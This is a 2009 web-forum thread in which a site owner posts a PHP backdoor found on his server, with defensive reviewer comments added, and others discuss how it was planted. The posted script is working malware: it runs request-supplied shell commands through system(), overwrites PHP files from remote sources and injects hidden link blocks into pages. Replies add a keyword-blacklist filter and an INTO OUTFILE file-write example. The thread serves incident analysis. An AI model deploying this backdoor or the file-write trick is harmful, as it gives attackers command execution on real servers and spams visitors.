dreamwest Posted September 17, 2009 Share Posted September 17, 2009 Its been a while since ive had a security breach but Heres something i found on my server today, im assuming is a brute force attack on login form, and its trying to write to .htaccess (permissions now 444). Any ideas on what else it might do?? <?php
/*
 * Reviewer summary (defensive reading of the script below).
 *
 * - Main() selects an action purely by which request parameter is present;
 *   nothing in this script checks who is calling it.
 * - Com() passes a request parameter to system(); Update() overwrites a .php
 *   file with content read from a request-supplied location.
 * - Gen(), GenNew() and Gen2() create directories and .php pages whose content
 *   is read from a request-supplied prefix ($sg). MRepl() appends a zero-size
 *   (hidden) block to a file one directory up; Clear2() strips it again.
 * - Files touched in the script's own directory: "c", "m", "log", "1r.txt",
 *   "2r.txt", "1t", "w.txt", plus generated directories holding ".htaccess"
 *   (and "2.js" in Gen2). Markers left in the modified page: "<dd4>" / "<dd5>".
 *
 * Nothing here attacks a login form: the code only writes files and runs
 * commands on behalf of whoever requests this script.
 */

// Keep running after the client disconnects and lift the execution time limit.
ignore_user_abort(1);
set_time_limit(0);

/**
 * Delete the script's bookkeeping files ("c", "1r.txt", "2r.txt", "log")
 * from the current directory. Return values of unlink() are not checked.
 */
function Clear() {
    unlink("c");
    unlink("1r.txt");
    unlink("2r.txt");
    unlink("log");
}

/**
 * Strip the previously injected block from the target page and write it back.
 *
 * The target's name is read from the local file "m" and resolved one
 * directory up ("../<name>"). Prints " upt-ok" when done.
 */
function Clear2() {
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    // Remove everything between the markers that MRepl() writes.
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    // Remove anchors whose tag contains "_lm", and links containing "tmp6".
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    // Remove stray markers and the zero-size <font> wrapper.
    $fin = ereg_replace("<!--dd4-->", "", $fin);
    $fin = ereg_replace("<!--dd5-->", "", $fin);
    $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}

/**
 * Copy request parameter $name into $var (by reference).
 *
 * POST is read first, then GET, so a GET value overrides a POST value.
 * Returns false when the resulting value compares equal to "", true otherwise.
 */
function GetVar($name, &$var) {
    $var = "";
    if (isset($_POST[$name])) $var = $_POST[$name];
    if (isset($_GET[$name])) $var = $_GET[$name];
    if (($var) =="") return false; else return true;
}

/**
 * Create a batch of ten pages under a randomly named directory.
 *
 * Request parameter "sg" is used as a prefix for everything that is read:
 * "<sg>2.txt" becomes the directory's .htaccess and "<sg>sgen.php" supplies
 * page content. Presumably "sg" is a remote URL (other generators append a
 * query string to it), which PHP only opens when allow_url_fopen is on;
 * TODO confirm against the web server logs.
 */
function GenNew() {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();   // never used
    if (isset($_POST["sg"])) $sg = $_POST["sg"];
    if (isset($_GET["sg"])) $sg = $_GET["sg"];
    $path = "";        // never used
    $fr = fopen("1r.txt", "a+");   // list of generated page paths
    if (file_exists("c")) {
        // State file exists: reuse the directory name stored on its first line.
        $fconf = file("c");
        $tname = trim($fconf[0]);
    } else {
        // First run: pick a 5-letter directory name and record it in "c".
        $fconf = fopen("c", "w+");
        $rnd = mt_rand(0, 999);   // never used
        $nm = "";
        for ($i=0; $i<5; $i++) {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        mkdir($tname);
        fwrite($fconf, $tname);
        $pid = 0;
        // Write "<sg>2.txt" into the new directory as its .htaccess.
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
    }
    $gname = $sg."sgen.php";
    // NOTE(review): $pid is only assigned in the else branch above; when "c"
    // already exists it is undefined at this point.
    for ($j=$pid; $j<$pid+10; $j++) {
        $fc = "";
        $fp = fopen($gname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        // Whatever follows "</html>" in the fetched text is used as the page name.
        $arr = explode("</html>", $fin);
        //print_r($arr);
        $curs = trim($arr[1]);
        $newf = "$tname/$curs/";
        echo "$newf";
        mkdir($newf);
        $fnd = fopen("$tname/$curs/$curs".".php", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        fwrite($fr, "$tname/$curs/$curs".".php\n");
    }
}

/**
 * Create a batch of ten interlinked pages named after entries of the file "1t".
 *
 * On the first run it creates a random 5-letter directory, writes .htaccess
 * ("<sg>2.txt"), "2.js" ("<sg>2js.txt") and the name list "1t" ("<sg>1t.php").
 * Each page is read from "<sg>sgen2.php?th=<name>" and its "<LINKS2>"
 * placeholder is replaced with a list of links to other generated pages.
 * The state file "c" holds the directory name and a running counter.
 * "1t" is indexed up to 299, so it presumably holds at least 300 names.
 */
function Gen2() {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();   // never used
    $md = false;
    if (isset($_POST["sg"])) $sg = $_POST["sg"];
    if (isset($_GET["sg"])) $sg = $_GET["sg"];
    if (isset($_GET["md"])) $md = true;   // enables logging of generated paths
    $path = "";        // never used
    $fr = fopen("1r.txt", "a+");
    $f2r = fopen("2r.txt", "a+");
    if (file_exists("c")) {
        // Resume: line 0 is the directory name, line 1 the page counter.
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $i_dor = trim($fconf[1]);
        $i_dor = $i_dor+0;   // numeric cast
    } else {
        $fconf = fopen("c", "w+");
        $rnd = mt_rand(0, 999);   // never used
        $nm = "";
        for ($i=0; $i<5; $i++) {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        mkdir($tname);
        fwrite($fconf, $tname."\n");
        fwrite($fconf, "0\n");
        $pid = 0;
        // .htaccess for the new directory, read from "<sg>2.txt".
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        // "2.js" for the new directory, read from "<sg>2js.txt".
        $fht = fopen("$tname/2.js", "w+");
        $htname = $sg."2js.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        // Local name list "1t", read from "<sg>1t.php".
        $f1t = fopen("1t", "w+");
        $f1tname = $sg."1t.php";
        $fp = fopen($f1tname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($f1t, $fin);
        fclose($f1t);
    }
    // Increment then decrement; on a first run $i_dor has not been assigned
    // before this pair.
    $i_dor++;
    $i_dor--;
    $a1t = file("1t");
    $gname = $sg."sgen2.php";
    // NOTE(review): $pid is undefined here when "c" already existed.
    for ($j=$pid; $j<$pid+10; $j++) {
        $cth = trim($a1t[$i_dor]);
        $i_dor++;
        $fc = "";
        $fp = fopen($gname."?th=$cth", "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        $links ="";
        // Ordinary pages: 22 links to randomly chosen names.
        if (($i_dor<196) || ($i_dor>199)) {
            for ($y=0; $y<22; $y++) {
                $rndi = mt_rand(0,299);
                $rth = trim($a1t[$rndi]);
                $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
            }
        }
        // Counter values 196..199: each page links a consecutive quarter
        // (75 names) of entries 0..299.
        if ($i_dor==196) {
            for ($y=0; $y<75; $y++) {
                $rth = trim($a1t[$y]);
                $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
            }
        }
        if ($i_dor==197) {
            for ($y=75; $y<150; $y++) {
                $rth = trim($a1t[$y]);
                $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
            }
        }
        if ($i_dor==198) {
            for ($y=150; $y<225; $y++) {
                $rth = trim($a1t[$y]);
                $links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
            }
        }
        if ($i_dor==199) {
            for ($y=225; $y<300; $y++) {
                $rth = trim($a1t[$y]);
                $links .= "<li> <a href='$rth.php'>$rth</a></li> \n";
            }
        }
        $fin = ereg_replace("<LINKS2>", $links, $fin);
        $curs = $cth;
        $fnd = fopen("$tname/$curs".".php", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        // With "md" set, the four link-hub pages are logged to 1r.txt and
        // all other pages to 2r.txt.
        if (($md) && ($i_dor==196 || $i_dor==197 || $i_dor==198 || $i_dor==199)) {
            fwrite($fr, "$tname/$curs".".php\n");
        }
        if (($md) && ($i_dor<196 || $i_dor>199) ) {
            fwrite($f2r, "$tname/$curs".".php\n");
        }
    }
    // Persist directory name and counter for the next request.
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n".$i_dor."\n");
    fclose($fconf);
}

/**
 * Create pages in batches of ten under "<dir>/<subdir>/", 100 per subdirectory.
 *
 * Request parameters: "sg" (read prefix) and "gm" (value stored in $curs and
 * sent as "g" to "<sg>sgen.php"). State in "c" is four lines: directory,
 * subdirectory, current "g" value, and the next page index. When the index
 * reaches 100 an extra "<curs>_lm.php" page is written and its path logged
 * to 1r.txt; the next call then starts a new 3-letter subdirectory.
 */
function Gen() {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();   // never used
    if (isset($_POST["sg"])) $sg = $_POST["sg"];
    if (isset($_GET["sg"])) $sg = $_GET["sg"];
    if (isset($_POST["gm"])) $g = $_POST["gm"];
    if (isset($_GET["gm"])) $g = $_GET["gm"];
    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c")) {
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100) {
            // Previous subdirectory is full: start a new 3-letter one.
            $pid = 0;
            $rnd = mt_rand(0, 999);   // never used
            $nm = "";
            for ($i=0; $i<3; $i++) {
                $ran = mt_rand(0,26);
                $sym = $alp[$ran];
                $nm = $nm.$sym;
            }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    } else {
        // First run: 5-letter directory, its .htaccess, and a 3-letter subdirectory.
        $rnd = mt_rand(0, 999);   // never used
        $nm = "";
        for ($i=0; $i<5; $i++) {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $rnd = mt_rand(0, 999);   // never used
        $nm = "";
        for ($i=0; $i<3; $i++) {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $cname = $nm;
        mkdir("$tname/$cname");
    }
    $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++) {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }
    if ($j==100) {
        // Subdirectory complete: fetch the "&m=1" variant and save it as "_lm.php".
        $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp)) {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        $map = "$path/$tname/$cname/$curs"."_lm.php";
        fwrite($fr,"$map\n");
    }
    // Persist the four state lines for the next request.
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}

/**
 * Overwrite "<name>.php" with content read from the location given in "u".
 *
 * Both the destination name (GET "name") and the source ("u", POST or GET)
 * come straight from the request, so this is an unrestricted write of a
 * .php file into the script's directory.
 */
function Update() {
    if (isset($_GET["name"])) $sname = $_GET["name"];
    $thisname = "$sname.php";
    if (isset($_POST['u'])) $u = $_POST['u'];
    if (isset($_GET['u'])) $u = $_GET['u'];
    $fp = fopen($u, "r");
    $fin = '';
    while (!feof($fp)) {
        $fc = fgets($fp, 1024);
        if (!$fc) break;
        $fin .= $fc;
    }
    fclose($fp);
    $fthis = fopen($thisname, "w+");
    fwrite($fthis, $fin);
    fclose($fthis);
}

/**
 * Pass request parameter "c" (POST and/or GET) to system().
 *
 * The value is used unmodified and errors are suppressed with "@", so any
 * request reaching this script can run commands as the web server's user.
 */
function Com() {
    if (isset($_POST['c'])) @system($_POST['c']);
    if (isset($_GET['c'])) @system($_GET['c']);
}

/**
 * Append a zero-size (invisible) block to the page named in the file "m".
 *
 * The page is read from "../<name>", its closing </body> and </html> tags and
 * any earlier injected block are removed, and the content read from request
 * parameter "mpt" is appended between "<dd4>" and "<dd5>" markers inside a
 * <font> element styled to height 0 / width 0. The script exits without
 * writing if a read from "mpt" returns nothing.
 */
function MRepl() {
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";
    $endtag = "</font></body></html><dd5> ";
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
    // (original comment is mis-encoded on this page and cannot be read)
    $fin = preg_replace ("/<\/body>/i", "", $fin);
    $fin = preg_replace ("/<\/html>/i", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
    $drs = '';
    while (!feof($fp)) {
        $fc = fgets($fp, 1024);
        if (!$fc) {
            exit();
        }
        $drs .= $fc;
    }
    fclose($fp);
    $fin = $fin.$begtag;
    $fin = $fin.$drs;
    $fin = $fin.$endtag;
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

/**
 * Read "<wr>w.txt" (prefix from GET "wr") and save it locally as "w.txt".
 * Judging by the name, a check that reading and writing work; the code
 * itself only copies the file.
 */
function WrTest() {
    $path = trim($_GET['wr']);
    $htname = $path."w.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp)) {
        $fc = fgets($fp, 1024);
        if (!$fc) break;
        $fin .= $fc;
    }
    fclose($fp);
    ;
    $fout = fopen("w.txt", "w+");
    fwrite($fout, $fin);
    fclose($fout);
}

/**
 * Dispatch on the first matching request parameter (POST or GET), then exit.
 *
 * Order checked: u, c, g, g1, g2, s, cl, cl2, wr. With none present the
 * script prints "<ok>". In access logs, requests to this file carrying any
 * of these parameter names are what to search for.
 */
function Main() {
    if (isset($_POST['u']) || isset($_GET['u'])) {
        Update();
        exit();
    }
    if (isset($_POST['c']) || isset($_GET['c'])) {
        Com();
        exit();
    }
    if (isset($_POST['g']) || isset($_GET['g'])) {
        Gen();
        exit();
    }
    if (isset($_POST['g1']) || isset($_GET['g1'])) {
        GenNew();
        exit();
    }
    if (isset($_POST['g2']) || isset($_GET['g2'])) {
        Gen2();
        exit();
    }
    if (isset($_POST['s']) || isset($_GET['s'])) {
        MRepl();
        exit();
    }
    if (isset($_POST['cl']) || isset($_GET['cl'])) {
        Clear();
        exit();
    }
    if (isset($_POST['cl2']) || isset($_GET['cl2'])) {
        Clear2();
        exit();
    }
    if (isset($_POST['wr']) || isset($_GET['wr'])) {
        WrTest();
        exit();
    }
    echo "<ok>";
}

Main();
?> Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/ Share on other sites More sharing options...
.josh Posted September 17, 2009 well for one thing, you aren't validating any GET or POST vars. At least, not in that script.
MadTechie Posted September 17, 2009 The fact someone got a PHP file on your server proves you need to write some security,
dreamwest Posted September 17, 2009 Author Share Posted September 17, 2009 well for one thing, you aren't validating any GET or POST vars. At least, not in that script. I use strip tags and str_replate to sanitize it, and i know that not nearly enough. Ive added this , ill see if that stops it:
// NOTE(review): these filters act only on the login form's two fields; nothing
// below restricts how files get written to disk, which is what the script in
// the first post does.
$username = substr(trim($_POST['username']),0,20);
// prevent SQL-injection
// NOTE(review): only backslash and double quote are escaped here (single quotes
// pass through). Hand-rolled escaping is not a substitute for prepared
// statements, or the database driver's own escaping, at the query itself; the
// query that uses this value is not shown in the post.
$username = str_replace('\\','\\\\', $username);
$username = str_replace('"','\"', $username);
// prevent XSS-attack, Shell-execute and JavaScript execution
// NOTE(review): a keyword blacklist blanks ordinary input ("File" with the /i
// flag also matches e.g. "profile") and does not make a value safe for SQL,
// HTML or a shell; each of those needs escaping for its own context at the
// point of use.
if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$username)) { $username = ''; }
if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$username)) { $username = ''; }
if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$username)) { $username = ''; }
if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$username)) { $username = ''; }
// NOTE(review): the password is cut to 20 characters and replaced by '' when it
// contains any listed word, so the value checked later is not the value the
// user typed. How the password is compared or hashed is not shown; confirm it
// is hashed unmodified rather than filtered like this.
$password = substr(trim($_POST['password']),0,20);
// prevent SQL-injection
$password = str_replace('\\','\\\\', $password);
$password = str_replace('"','\"', $password);
// prevent XSS-attack, Shell-execute and JavaScript execution
if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$password)) { $password = ''; }
if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$password)) { $password = ''; }
if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$password)) { $password = ''; }
if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$password)) { $password = ''; }
Quote Link to comment https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920415 Share on other sites More sharing options...
MadTechie Posted September 17, 2009 /*No Comment*/
corbin Posted September 17, 2009 If someone got a file on your server, it obviously wasn't through SQL injection.
dreamwest Posted September 18, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. I dont get how they can add not only a php file but a directory, my ftp is 20 chars mixed, i change it every 3 months. I clean post, get, and requests using strip_tags and str_replace, and database queries with mysql_real_escape_string() Im outta ideas on how else they could do it
corbin Posted September 18, 2009 Do you have any file upload scripts? Also, do you store anything in a DB and eval() it?
dreamwest Posted September 18, 2009 Do you have any file upload scripts? Also, do you store anything in a DB and eval() it? I do , i allow ppl to upload videos only....and its the only place i haven't checked. Ill do it now
play_ Posted September 18, 2009 Post a link. I'd like to see this video upload form
waynew Posted September 19, 2009 Upload script is probably vulnerable. Either that or your hosting is to blame. I'd go with the latter.
xylex Posted September 20, 2009 If someone got a file on your server, it obviously wasn't through SQL injection. Not true. SELECT "<?php phpinfo();" INTO OUTFILE hack.php; (This only works when the database account the application uses holds the FILE privilege and the database server can write into a web-served directory, so an application account without FILE closes this route.)
corbin Posted September 20, 2009 Hrmmm, true. I forgot about INTO OUTFILE .
roopurt18 Posted September 20, 2009 I dont get how they can add not only a php file but a directory, my ftp is 20 chars mixed, i change it every 3 months. And FTP information is sent in plain text from your machine to the server.